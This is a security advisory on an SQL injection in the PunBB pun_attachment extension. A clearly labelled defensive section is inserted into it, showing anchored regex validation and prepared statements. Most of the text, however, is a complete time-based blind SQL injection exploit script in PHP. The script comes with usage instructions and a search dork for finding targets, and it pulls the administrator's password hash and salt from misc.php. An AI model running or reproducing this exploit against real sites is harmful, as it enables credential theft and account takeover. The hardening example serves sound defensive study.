By Ryat
http://www.wolvez.org
I wanted to add an attachment upload function to the forum, so I downloaded the pun_attachment extension from the official website. While I was at it I looked through the code and found this vulnerability:
if (isset($_GET['secure_str']))
{
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
    {
        ...
        'WHERE' => 'a.id='.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum=1) AND secure_str=\''.$_GET['secure_str'].'\'',
Obviously the regular expression is misused: it has no anchors, so preg_match() only checks that "<digits>f<digits>" appears somewhere in the value, and then the raw $_GET['secure_str'] (not the captured $match) is concatenated straight into the query. That is an SQL injection through $_GET['secure_str'].
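What the corrected check looks like, as an added example that is not code from pun_attachment or from this advisory: the unanchored preg_match() shape from the snippet above beside an anchored version that hands back only the captured integers, plus a lookup that binds the value with a prepared statement instead of concatenating it. The $pdo handle, the attach_files table name and the meaning of the two captured numbers are assumptions for illustration.

```php
<?php
// Added example, not code from pun_attachment or from the advisory.

// Weak check (the shape the advisory describes): the pattern has no anchors,
// so preg_match() only asks whether "<digits>f<digits>" appears somewhere in
// the string. "1f1' AND 1=1#" contains "1f1" and therefore passes.
function secure_str_passes_weak_check(string $secure_str): bool
{
    return preg_match('~(\d+)f(\d+)~', $secure_str) === 1;
}

// Hardened check: ^ and $ (with the D modifier, so a trailing newline is not
// tolerated either) force the whole value to be "<digits>f<digits>", and the
// caller receives the two captured integers, never the raw request string.
function parse_secure_str(string $secure_str): ?array
{
    if (preg_match('~^(\d+)f(\d+)$~D', $secure_str, $m) !== 1) {
        return null;
    }
    return [(int) $m[1], (int) $m[2]];
}

// Hardened lookup: same WHERE shape as the vulnerable query, but the values are
// bound through a prepared statement, so a value that somehow got past
// validation still cannot change the structure of the query.
// $pdo is an assumed PDO connection; attach_files is an assumed table name.
function find_attachment(PDO $pdo, int $attach_item, string $secure_str): ?array
{
    if (parse_secure_str($secure_str) === null) {
        return null;
    }
    $stmt = $pdo->prepare(
        'SELECT a.* FROM attach_files AS a WHERE a.id = :id AND a.secure_str = :secure_str'
    );
    $stmt->execute([':id' => $attach_item, ':secure_str' => $secure_str]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a legitimate value and an injection-shaped one.
$legit = '12f34';
$probe = "1f1' AND 1=1#";

var_dump(secure_str_passes_weak_check($legit));
var_dump(secure_str_passes_weak_check($probe));
var_dump(parse_secure_str($legit));
var_dump(parse_secure_str($probe));
```

Run it with the php CLI: the weak check returns true for both inputs, while parse_secure_str() returns [12, 34] for the legitimate value and null for the probe. Anchoring alone is not the whole fix; the prepared statement is what removes the injection even when validation is bypassed, and the two together are what a review of misc.php should be looking for.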
There is also an injection in pun_list_attach.php, but it requires admin (back-end) privileges; if you are interested, you can find it easily enough :)
Finally, a PoC exploit. Don't ask me what exactly it achieves or how to use it...
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Blind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');

/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host      = $argv[1];
$path      = $argv[2];
$pre       = 'pun_';
$benchmark = 200000000;
$timeout   = 10;

echo "Plz Waiting...\nPassword: ";

/**
 * get pass
 */
$j = 1;
$pass = '';
$hash[0] = 0; // null
$hash = array_merge($hash, range(48, 57));  // numbers
$hash = array_merge($hash, range(97, 122)); // a-z letters

while (strlen($pass) < 40) {
    for ($i = 0; $i <= 255; $i++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $pass .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255)
            exit("Exploit Failed!\n");
    }
    $j++;
}

echo "\nSalt: ";

/**
 * get salt
 */
$j = 1;
$salt = '';
$hash[0] = 0; // null
$hash = array_merge($hash, range(33, 126));

while (strlen($salt) < 12) {
    for ($i = 0; $i <= 255; $i++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $salt .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255)
            exit("Exploit Failed!\n");
    }
    $j++;
}

exit("\nExploit Success!\nPassword Hash: $pass\nSalt: $salt\n");

function send()
{
    global $host, $path, $cmd;

    $data  = "GET ".$path."misc.php?item=1&secure_str=".$cmd." HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";

    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}
?>